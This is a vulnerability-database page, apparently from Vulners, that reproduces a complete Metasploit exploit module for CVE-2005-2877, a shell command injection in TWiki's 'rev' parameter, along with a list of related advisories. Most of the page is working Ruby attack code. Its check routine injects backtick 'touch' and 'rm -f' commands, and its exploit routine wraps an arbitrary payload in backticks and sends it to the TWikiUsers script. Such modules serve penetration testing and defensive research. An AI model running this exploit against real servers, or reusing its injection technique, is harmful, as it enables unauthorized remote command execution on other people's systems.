Lucene search
K

TWiki History TWikiUsers rev Parameter Command Execution

🗓️ 21 Feb 2010 20:31:09Reported by B4dP4nd4, jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 67 Views

TWiki vulnerability in history component allows arbitrary OS command executio

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Twiki rev Parameter Arbitrary Shell Command Execution
15 Sep 200500:00
nessus
Tenable Nessus
TWiki 'rev' Parameter Arbitrary Command Execution
15 Sep 200500:00
nessus
Circl
CVE-2005-2877
3 Jul 201000:00
circl
Check Point Advisories
TWiki rev Parameter Shell Command Injection (CVE-2005-2877)
5 Oct 200900:00
checkpoint_advisories
CVE
CVE-2005-2877
16 Sep 200504:00
cve
Cvelist
CVE-2005-2877
16 Sep 200504:00
cvelist
Exploit DB
TWiki History TWikiUsers - &#039;rev&#039; Command Execution (Metasploit)
3 Jul 201000:00
exploitdb
NVD
CVE-2005-2877
16 Sep 200520:03
nvd
Packet Storm
TWiki History TWikiUsers rev Parameter Command Execution
23 Feb 201000:00
packetstorm
Saint
TWiki revision control shell command injection
6 Apr 200600:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TWiki History TWikiUsers rev Parameter Command Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the history component of TWiki.
        By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers
        script, an attacker can execute arbitrary OS commands.
      },
      'Author'         =>
        [
          'B4dP4nd4',   # original discovery
          'jduck'       # metasploit version
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-2877' ],
          [ 'OSVDB', '19403' ],
          [ 'BID', '14834' ],
          [ 'URL', 'http://web.archive.org/web/20230609051423/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
        ],
      'Privileged'     => true, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          'BadChars'    => '',
          'Space'       => 1024,
        },
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2005-09-14',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
      ])
  end


  #
  # NOTE: This is not perfect, since it requires write access to the bin
  # directory. Unfortunately, detrmining the main directory isn't
  # trivial, or otherwise I would write there (required to be writable
  # per installation steps).
  #
  def check
    test_file = rand_text_alphanumeric(8+rand(8))
    cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers?rev=')
    test_url = normalize_uri(datastore['URI'], test_file)

    # first see if it already exists (it really shouldn't)
    res = send_request_raw({
        'uri' => test_url
      }, 25)
    if (not res) or (res.code != 404)
      vprint_warning("WARNING: The test file exists already!")
      return Exploit::CheckCode::Unknown # Need to try again
    end

    # try to create it
    vprint_status("Attempting to create #{test_url} ...")
    rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#'
    res = send_request_raw({
        'uri' => cmd_base + Rex::Text.uri_encode(rev)
      }, 25)
    if (not res) or (res.code != 200)
      return Exploit::CheckCode::Safe
    end

    # try to run it, 500 code == successfully made it
    res = send_request_raw({
        'uri' => test_url
      }, 25)
    if (not res) or (res.code != 500)
      return Exploit::CheckCode::Safe
    end

    # delete the tmp file
    print_status("Attempting to delete #{test_url} ...")
    rev = rand_text_numeric(1+rand(5)) + ' `rm -f ' + test_file + '`#'
    res = send_request_raw({
        'uri' => cmd_base + Rex::Text.uri_encode(rev)
      }, 25)
    if (not res) or (res.code != 200)
      vprint_warning("WARNING: unable to remove test file (#{test_file})")
    end

    return Exploit::CheckCode::Vulnerable
  end


  def exploit

    rev = rand_text_numeric(1+rand(5))
    rev << ' `' + payload.encoded + '`#'
    query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
    query_str << '?rev='
    query_str << Rex::Text.uri_encode(rev)

    res = send_request_cgi({
        'method'    => 'GET',
        'uri'	      => query_str,
      }, 25)

    if (res and res.code == 200)
      print_good("Successfully sent exploit request")
    else
      fail_with(Failure::Unknown, "Error sending exploit request")
    end

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Feb 2025 09:20Current
6.9Medium risk
Vulners AI Score6.9
CVSS 27.5
EPSS0.71104
67